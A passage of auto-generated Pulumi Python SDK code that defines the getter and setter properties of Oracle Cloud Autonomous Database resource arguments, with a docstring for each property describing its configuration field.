The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@autonomous_maintenance_schedule_type.setter
def autonomous_maintenance_schedule_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "autonomous_maintenance_schedule_type", value)
@property
@pulumi.getter(name="availableUpgradeVersions")
def available_upgrade_versions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
"""
return pulumi.get(self, "available_upgrade_versions")
@available_upgrade_versions.setter
def available_upgrade_versions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "available_upgrade_versions", value)
@property
@pulumi.getter(name="backupConfig")
def backup_config(self) -> Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']]:
"""
Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
"""
return pulumi.get(self, "backup_config")
@backup_config.setter
def backup_config(self, value: Optional[pulumi.Input['AutonomousDatabaseBackupConfigArgs']]):
pulumi.set(self, "backup_config", value)
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@clone_type.setter
def clone_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "clone_type", value)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter(name="connectionStrings")
def connection_strings(self) -> Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']]:
"""
The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
"""
return pulumi.get(self, "connection_strings")
@connection_strings.setter
def connection_strings(self, value: Optional[pulumi.Input['AutonomousDatabaseConnectionStringsArgs']]):
pulumi.set(self, "connection_strings", value)
@property
@pulumi.getter(name="connectionUrls")
def connection_urls(self) -> Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']]:
"""
The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl", "https://<hostname>/ords..."}`
"""
return pulumi.get(self, "connection_urls")
@connection_urls.setter
def connection_urls(self, value: Optional[pulumi.Input['AutonomousDatabaseConnectionUrlsArgs']]):
pulumi.set(self, "connection_urls", value)
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@cpu_core_count.setter
def cpu_core_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_core_count", value)
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@customer_contacts.setter
def customer_contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]]):
pulumi.set(self, "customer_contacts", value)
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@data_safe_status.setter
def data_safe_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_safe_status", value)
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@data_storage_size_in_gb.setter
def data_storage_size_in_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_gb", value)
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@data_storage_size_in_tbs.setter
def data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> Optional[pulumi.Input[str]]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
"""
return pulumi.get(self, "db_version")
@db_version.setter
def db_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_version", value)
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
@db_workload.setter
def db_workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_workload", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="failedDataRecoveryInSeconds")
def failed_data_recovery_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Indicates the number of seconds of data loss for a Data Guard failover.
"""
return pulumi.get(self, "failed_data_recovery_in_seconds")
@failed_data_recovery_in_seconds.setter
def failed_data_recovery_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failed_data_recovery_in_seconds", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="infrastructureType")
def infrastructure_type(self) -> Optional[pulumi.Input[str]]:
"""
The infrastructure type this resource belongs to.
"""
return pulumi.get(self, "infrastructure_type")
@infrastructure_type.setter
def infrastructure_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "infrastructure_type", value)
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@is_access_control_enabled.setter
def is_access_control_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_access_control_enabled", value)
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@is_auto_scaling_enabled.setter
def is_auto_scaling_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_auto_scaling_enabled", value)
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@is_data_guard_enabled.setter
def is_data_guard_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_data_guard_enabled", value)
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> Optional[pulumi.Input[bool]]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@is_dedicated.setter
def is_dedicated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_dedicated", value)
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@is_free_tier.setter
def is_free_tier(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_free_tier", value)
@property
@pulumi.getter(name="isPreview")
def is_preview(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates if the Autonomous Database version is a preview version.
"""
return pulumi.get(self, "is_preview")
@is_preview.setter
def is_preview(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview", value)
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> Optional[pulumi.Input[bool]]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@is_preview_version_with_service_terms_accepted.setter
def is_preview_version_with_service_terms_accepted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_preview_version_with_service_terms_accepted", value)
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@is_refreshable_clone.setter
def is_refreshable_clone(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_refreshable_clone", value)
@property
@pulumi.getter(name="keyHistoryEntries")
def key_history_entries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]]:
"""
Key History Entry.
"""
return pulumi.get(self, "key_history_entries")
@key_history_entries.setter
def key_history_entries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseKeyHistoryEntryArgs']]]]):
pulumi.set(self, "key_history_entries", value)
@property
@pulumi.getter(name="keyStoreId")
def key_store_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
"""
return pulumi.get(self, "key_store_id")
@key_store_id.setter
def key_store_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_store_id", value)
@property
@pulumi.getter(name="keyStoreWalletName")
def key_store_wallet_name(self) -> Optional[pulumi.Input[str]]:
"""
The wallet name for Oracle Key Vault.
"""
return pulumi.get(self, "key_store_wallet_name")
@key_store_wallet_name.setter
def key_store_wallet_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_store_wallet_name", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="kmsKeyLifecycleDetails")
def kms_key_lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
KMS key lifecycle details.
"""
return pulumi.get(self, "kms_key_lifecycle_details")
@kms_key_lifecycle_details.setter
def kms_key_lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_lifecycle_details", value)
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@license_model.setter
def license_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "license_model", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@nsg_ids.setter
def nsg_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "nsg_ids", value)
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> Optional[pulumi.Input[float]]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@ocpu_count.setter
def ocpu_count(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "ocpu_count", value)
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> Optional[pulumi.Input[str]]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@open_mode.setter
def open_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "open_mode", value)
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> Optional[pulumi.Input[str]]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@operations_insights_status.setter
def operations_insights_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operations_insights_status", value)
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> Optional[pulumi.Input[str]]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@permission_level.setter
def permission_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "permission_level", value)
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The private endpoint for the resource.
"""
return pulumi.get(self, "private_endpoint")
@private_endpoint.setter
def private_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint", value)
@property
@pulumi.getter(name="privateEndpointIp")
def private_endpoint_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private endpoint Ip address for the resource.
"""
return pulumi.get(self, "private_endpoint_ip")
@private_endpoint_ip.setter
def private_endpoint_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_ip", value)
@property
@pulumi.getter(name="privateEndpointLabel")
def private_endpoint_label(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The private endpoint label for the resource.
"""
return pulumi.get(self, "private_endpoint_label")
@private_endpoint_label.setter
def private_endpoint_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_label", value)
@property
@pulumi.getter(name="refreshableMode")
def refreshable_mode(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_mode")
@refreshable_mode.setter
def refreshable_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_mode", value)
@property
@pulumi.getter(name="refreshableStatus")
def refreshable_status(self) -> Optional[pulumi.Input[str]]:
"""
The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
"""
return pulumi.get(self, "refreshable_status")
@refreshable_status.setter
def refreshable_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "refreshable_status", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="rotateKeyTrigger")
def rotate_key_trigger(self) -> Optional[pulumi.Input[bool]]:
"""
(Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
"""
return pulumi.get(self, "rotate_key_trigger")
@rotate_key_trigger.setter
def rotate_key_trigger(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "rotate_key_trigger", value)
@property
@pulumi.getter(name="serviceConsoleUrl")
def service_console_url(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the Service Console for the Autonomous Database.
"""
return pulumi.get(self, "service_console_url")
@service_console_url.setter
def service_console_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_console_url", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="standbyDb")
def standby_db(self) -> Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']]:
"""
Autonomous Data Guard standby database details.
"""
return pulumi.get(self, "standby_db")
@standby_db.setter
def standby_db(self, value: Optional[pulumi.Input['AutonomousDatabaseStandbyDbArgs']]):
pulumi.set(self, "standby_db", value)
@property
@pulumi.getter(name="standbyWhitelistedIps")
def standby_whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "standby_whitelisted_ips")
@standby_whitelisted_ips.setter
def standby_whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "standby_whitelisted_ips", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="switchoverTo")
def switchover_to(self) -> Optional[pulumi.Input[str]]:
"""
It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
"""
return pulumi.get(self, "switchover_to")
@switchover_to.setter
def switchover_to(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "switchover_to", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Autonomous Database was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeDeletionOfFreeAutonomousDatabase")
def time_deletion_of_free_autonomous_database(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
"""
return pulumi.get(self, "time_deletion_of_free_autonomous_database")
@time_deletion_of_free_autonomous_database.setter
def time_deletion_of_free_autonomous_database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_deletion_of_free_autonomous_database", value)
@property
@pulumi.getter(name="timeMaintenanceBegin")
def time_maintenance_begin(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when maintenance will begin.
"""
return pulumi.get(self, "time_maintenance_begin")
@time_maintenance_begin.setter
def time_maintenance_begin(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_maintenance_begin", value)
@property
@pulumi.getter(name="timeMaintenanceEnd")
def time_maintenance_end(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when maintenance will end.
"""
return pulumi.get(self, "time_maintenance_end")
@time_maintenance_end.setter
def time_maintenance_end(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_maintenance_end", value)
@property
@pulumi.getter(name="timeOfLastFailover")
def time_of_last_failover(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp of the last failover operation.
"""
return pulumi.get(self, "time_of_last_failover")
@time_of_last_failover.setter
def time_of_last_failover(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_failover", value)
@property
@pulumi.getter(name="timeOfLastRefresh")
def time_of_last_refresh(self) -> Optional[pulumi.Input[str]]:
"""
The date and time when last refresh happened.
"""
return pulumi.get(self, "time_of_last_refresh")
@time_of_last_refresh.setter
def time_of_last_refresh(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_refresh", value)
@property
@pulumi.getter(name="timeOfLastRefreshPoint")
def time_of_last_refresh_point(self) -> Optional[pulumi.Input[str]]:
"""
The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
"""
return pulumi.get(self, "time_of_last_refresh_point")
@time_of_last_refresh_point.setter
def time_of_last_refresh_point(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_refresh_point", value)
@property
@pulumi.getter(name="timeOfLastSwitchover")
def time_of_last_switchover(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp of the last switchover operation for the Autonomous Database.
"""
return pulumi.get(self, "time_of_last_switchover")
@time_of_last_switchover.setter
def time_of_last_switchover(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_last_switchover", value)
@property
@pulumi.getter(name="timeOfNextRefresh")
def time_of_next_refresh(self) -> Optional[pulumi.Input[str]]:
"""
The date and time of next refresh.
"""
return pulumi.get(self, "time_of_next_refresh")
@time_of_next_refresh.setter
def time_of_next_refresh(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_of_next_refresh", value)
@property
@pulumi.getter(name="timeReclamationOfFreeAutonomousDatabase")
def time_reclamation_of_free_autonomous_database(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
"""
return pulumi.get(self, "time_reclamation_of_free_autonomous_database")
@time_reclamation_of_free_autonomous_database.setter
def time_reclamation_of_free_autonomous_database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_reclamation_of_free_autonomous_database", value)
@property
@pulumi.getter
def timestamp(self) -> Optional[pulumi.Input[str]]:
"""
The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
"""
return pulumi.get(self, "timestamp")
@timestamp.setter
def timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timestamp", value)
@property
@pulumi.getter(name="usedDataStorageSizeInTbs")
def used_data_storage_size_in_tbs(self) -> Optional[pulumi.Input[int]]:
"""
The amount of storage that has been used, in terabytes.
"""
return pulumi.get(self, "used_data_storage_size_in_tbs")
@used_data_storage_size_in_tbs.setter
def used_data_storage_size_in_tbs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "used_data_storage_size_in_tbs", value)
@property
@pulumi.getter(name="vaultId")
def vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
"""
return pulumi.get(self, "vault_id")
@vault_id.setter
def vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vault_id", value)
@property
@pulumi.getter(name="whitelistedIps")
def whitelisted_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
(Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
return pulumi.get(self, "whitelisted_ips")
@whitelisted_ips.setter
def whitelisted_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
